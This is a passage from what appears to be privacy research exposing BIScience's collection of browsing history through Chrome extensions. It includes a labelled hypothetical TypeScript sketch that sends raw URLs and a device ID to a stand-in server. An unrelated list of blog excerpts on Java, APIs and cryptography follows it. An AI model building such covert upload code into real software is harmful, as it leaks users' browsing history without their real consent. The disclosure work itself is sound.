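The dual purpose of such an endpoint is easiest to see in code. In this hypothetical sketch (invented endpoint and field names, not the actual SDK), the very request that asks for a verdict also delivers the full URL and a persistent identifier to the server:

```typescript
// Hypothetical sketch of a "safe browsing check" that doubles as data collection.
// Endpoint and field names are invented; the point is that the verdict and the
// clickstream upload are one and the same request.
async function checkUrl(url: string, deviceId: string): Promise<boolean> {
  const res = await fetch("https://check.example.com/verdict", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ url, uid: deviceId }), // raw URL + stable ID leave the browser either way
  });
  const { malicious } = await res.json();
  return Boolean(malicious);
}
```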
Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.
Let’s look at this illuminating graphic, sent by BIScience to one of our sources:
Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.
BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:
Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:
- Detect and suggest to close malware websites;
- Analytics and Traffic Intelligence
This and other suggested clauses contradict each other or are misleading to users.
Quick fact check:
An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.
BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.
As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:
We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.
When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.
Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.
If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.
Browser extension users deserve better privacy and transparency.
If you want to learn more about browser extensions collecting your browsing history for profit:
The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.
We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.
Collection endpoints seen in third-party extensions:
Collection endpoints seen in BIScience-owned extensions and software:
Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):
Collection endpoints seen in online data, software unknown but likely in third-party software:
Collection endpoint in third-party software, identified in 2019 DataSpii research:
When I was writing Rating 26 years of Java changes, I started reflecting on the new HttpClient library in Java 11. The old way of fetching a URL was to use URL.openConnection(). This was intended to be a generic mechanism for retrieving the contents of any URL: files, web resources, FTP servers, etc. It was a […]
This post covers several topics around collections (sets, lists, maps/dictionaries, queues, etc) that I’d like to see someone explore more fully. To my knowledge, there are many alternative collection libraries for Java and for many other languages, but I’m not aware of any that provide support for monotonic collections. What is a monotonic collection, I […]
It’s been a while since I’ve written a pure programming post. I was recently implementing a specialist collection class that contained items of a number of different types. I needed to be able to iterate over the collection performing different actions depending on the specific type. There are lots of different ways to do this, […]
I first started programming Java at IBM back in 1999 as a Pre-University Employee. If I remember correctly, we had Java 1.1.8 installed at that time, but were moving to Java 1.2 (“Java 2”), which was a massive release—I remember engineers at the time grumbling that the ever-present “Java in a Nutshell” book had grown […]
OK, so you’ve made your JSON-over-HTTP API. Then someone told you that it’s not “really” REST unless it’s hypertext-driven. So now all your responses contain links, and you’re defining mediatypes properly and all that stuff. But I’m here to tell you that you’re still not doing it right. What you’re doing now is just “HYPE”. […]
Note: this post will probably only really make sense to cryptography geeks. In “When a KEM is not enough”, I described how to construct multi-recipient (public key) authenticated encryption. A naïve approach to this is vulnerable to insider forgeries: any recipient can construct a new message (to the same recipients) that appears to come from the […]
tl;dr: yes, contra thingamajig’s law of wotsits. Before the final nail has even been hammered on the coffin of AI, I hear the next big marketing wave is “quantum”. Quantum computing promises to speed up various useful calculations, but is also potentially catastrophic to widely-deployed public key cryptography. Shor’s algorithm for a quantum computer, if […]
I decided today to take a look at CloudFlare’s new OAuth provider library, which they apparently coded almost entirely with Anthropic’s Claude LLM: This library (including the schema documentation) was largely written with the help of Claude, the AI model by Anthropic. Claude’s output was thoroughly reviewed by Cloudflare engineers with careful attention paid to security […]
Every programmer knows Donald Knuth’s famous quote that “premature optimization is the root of all evil”, from his 1974 Turing Award lecture (pdf). A fuller quotation of the surrounding context gives a rounder view: I am sorry to say that many people nowadays are condemning program efficiency, telling us that it is in bad taste. […]
Wikipedia’s definition of a digital signature is: A digital signature is a mathematical scheme for verifying the authenticity of digital messages or documents. A valid digital signature on a message gives a recipient confidence that the message came from a sender known to the recipient. —Wikipedia They also have a handy diagram of the process […]
I’ve been slowly reading Brian Cantwell Smith’s “The Promise of Artificial Intelligence” recently. I haven’t finished reading it yet, and like much of BCS’s writing, it’ll probably take me 3 or 4 read-throughs to really understand it, but there’s one point that I want to pick up on. It is the idea that “Good Old-Fashioned […]
It turns out you can encrypt more than 2^32 messages with AES-GCM with a random nonce under certain conditions. It’s still not a good idea, but you can just about do it. #cryptography
I see a lot of attempts to define encryption schemes for constrained devices with short authentication tags (e.g., 64 bits) using universal hashing. For example, there’s a proposal in CFRG at the moment for a version of AES-GCM with short tags for this kind of use-case. In my (admittedly limited) experience, these kinds of constrained […]
Happy new year! I’m hoping to write a few posts on here over the next few weeks, but probably exploring a few topics around AI and philosophy. If you’d prefer some more technical content around security and cryptography, then take a look at the newsletter I put out for my consulting company, Illuminated Security. The […]
I was just reading yet another article on REST API design guidelines. Some of it is good advice, some of it I could quibble with. But several of the rules are about how to design the path hierarchy of your API: use plural nouns, don’t use nested sub-paths unnecessarily, etc. In this article I want […]
For better or worse, depending on your perspective, JSON has become a dominant data format and shows no signs of being replaced any time soon. There are good reasons for that: on the face of it, it provides a very simple format with just enough features to cover a lot of use-cases with minimal feature […]
If you want to learn how to store passwords securely, you could do a lot worse than looking at the OWASP Password Storage Cheat Sheet. These cheat sheets are generally pretty good, and the password storage one is particularly good. The editors do a great job of keeping it up to date and incorporating the […]
In cryptography, the process of authenticating a user (or app/service) is known as entity authentication or identification (to distinguish it from message authentication or data origin authentication). There are lots of ways to do this. In this post I’m going to talk about authentication schemes based on public key cryptography. It turns out that the […]
Mike Rosulek, Oregon State University. Draft of January 3, 2021. Online: The Joy of Cryptography. This is a freely-available book covering introductory material on cryptography. It’s suitable for anyone with undergraduate-level computer science knowledge. As is often the case in cryptography textbooks, there is a brief review of mathematical background in the first (or zeroth […]
I enjoyed Hillel Wayne’s recent newsletter about microfeatures they’d like to see in programming languages. A “microfeature” is essentially a small convenience that makes programming in that language a bit easier without fundamentally changing it. I love this idea. I’m partial to a bit of syntactic sugar, even if it can cause cancer of the […]
There has been a lot of discussion recently around the LastPass breach, especially with regards to the number of PBKDF2 iterations applied to the master password to derive the vault encryption key. Other people have already dissected this particular breach, but I want to more generally talk about PBKDF2 iterations and security models. (I’m not […]
Just a few quick notes/updates to correct some potentially inaccurate statements that are floating around on Reddit/Twitter etc: The bug only impacts Java 15 and above. The original advisory from Oracle incorrectly listed earlier versions (like 7, 8 and 11) as being impacted. They have since corrected this. Note that they now only list 17 […]
The long-running BBC sci-fi show Doctor Who has a recurring plot device where the Doctor manages to get out of trouble by showing an identity card which is actually completely blank. Of course, this being Doctor Who, the card is really made out of a special “psychic paper“, which causes the person looking at it […]
Datalog is a logic programming language, based on Prolog, which is seeing something of a resurgence in interest in recent years. In particular, several recent approaches to authorization (working out who can do what) have used Datalog as the logical basis for access control decisions. On the face of it, this seems like a perfect […]
I was catching up on the always excellent Security. Cryptography. Whatever. podcast, and enjoyed the episode with Colm MacCárthaigh about a bunch of topics around TLS. It’s a great episode that touches a lot of subjects I’m interested in, so go ahead and listen to it if you haven’t already, and definitely subscribe. I want […]
When working with Message Authentication Codes (MACs), you often need to authenticate not just a single string, but multiple fields of data. For example, when creating an authenticated encryption mode by composing a cipher and a MAC (like AES-CBC and HMAC), you need to ensure the MAC covers the IV, associated data, and the ciphertext. […]
This is the third part of my series on Key Encapsulation Mechanisms (KEMs) and why you should care about them. Part 1 looked at what a KEM is and the KEM/DEM paradigm for constructing public key encryption schemes. Part 2 looked at cases where the basic KEM abstraction is not sufficient and showed how it […]
In “Towards a standard for bearer token URLs”, I described a URL scheme that can be safely used to incorporate a bearer token (such as an OAuth access token) into a URL. That blog post concentrated on the technical details of how that would work and the security properties of the scheme. But as Tim Dierks […]
In XSS doesn’t have to be Game Over, and earlier when discussing Can you ever (safely) include credentials in a URL?, I raised the possibility of standardising a new URL scheme that safely allows encoding a bearer token into a URL. This makes it more convenient to use lots of very fine-grained tokens rather than one […]
In my previous post, I described the KEM/DEM paradigm for hybrid encryption. The key encapsulation mechanism is given the recipient’s public key and outputs a fresh AES key and an encapsulation of that key that the recipient can decapsulate to recover the AES key. In this post I want to talk about several ways that […]